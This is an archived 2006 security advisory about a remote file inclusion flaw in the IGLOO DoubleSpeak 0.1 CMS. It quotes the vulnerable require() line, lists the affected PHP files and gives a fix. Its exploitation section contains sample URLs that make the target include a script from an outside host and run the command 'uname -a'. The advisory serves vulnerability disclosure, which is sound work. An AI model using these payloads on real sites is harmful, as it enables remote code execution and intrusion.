AOH :: HP Unsorted I :: B06-2894.HTM

Igloo doublespeak v 0.1 multiple remote file inclusion



igloo DoubleSpeak v 0.1 Multiple remote file inclusion
igloo DoubleSpeak v 0.1 Multiple remote file inclusion



igloo DoubleSpeak v 0.1 Multiple remote file inclusion=0D
-----------------------------------------------------=0D
Aria-security.com advisory=0D
Bug Discovered by R@1D3N (amin emami)=0D
Original Advisory:http://www.aria-security.net/advisory/igloo/doublespeak.txt=0D 
email:AminRayden@yahoo.com=0D 
Date:12/06/2006=0D
-----------------------------------------------------=0D
Affected software description:=0D
IGLOO DoubleSpeak <= 0.1=0D
Vendor:http://sourceforge.net/projects/iglooweb/=0D 
Vulnerability:Multiple remote file inclusion=0D
-----------------------------------------------------=0D
Summary:=0D
DoubleSpeak, formerly known as the Igloo Weblog, =0D
aims to be the easiest to use and most customizable CMS (content management system) on the Internet.=0D
-----------------------------------------------------=0D
Vulnerable code:=0D
require "config.inc";=0D
  =0D
require "$config[private]/local.inc";=0D
-----------------------------------------------------=0D
Proof of concept:=0D
The problem exists is in the below files when used the variable $config[private]  in a require() function without being Declared=0D
index.php=0D
faq.php=0D
hardware.php=0D
ianal.php=0D
links.php=0D
login.php=0D
logout.php=0D
new_stories.php=0D
old.php=0D
poll.php=0D
rtfm.php=0D
software.php=0D
TODO.php=0D
/admin/add_links.php=0D
/admin/add_story.php=0D
/admin/add_poll.php=0D
/admin/index.php=0D
/admin/view_story_queue.php=0D
/ui/create_acct.php=0D
/ui/submit_story.php=0D
/ui/suggest_poll.php=0D
/ui/suggest_topic.php=0D
/ui/vote_on_polls.php=0D
-----------------------------------------------------=0D
Exploitation example:=0D
http://www.r0x3d.com/[igloo_Path]/html/index.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a=0D 
http://www.r0x3d.com/[igloo_Path]/html/faq.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a=0D 
http://www.r0x3d.com/[igloo_Path]/html/hardware.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a=0D 
...=0D
=0D
-----------------------------------------------------=0D
Fix:=0D
turn off register_globals and add this code before vulnerable code=0D
$config[private] = "./";=0D
=0D
============================0D
Aria Security Research=0D
Http://www.aria-security.net=0D 
=0D
=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.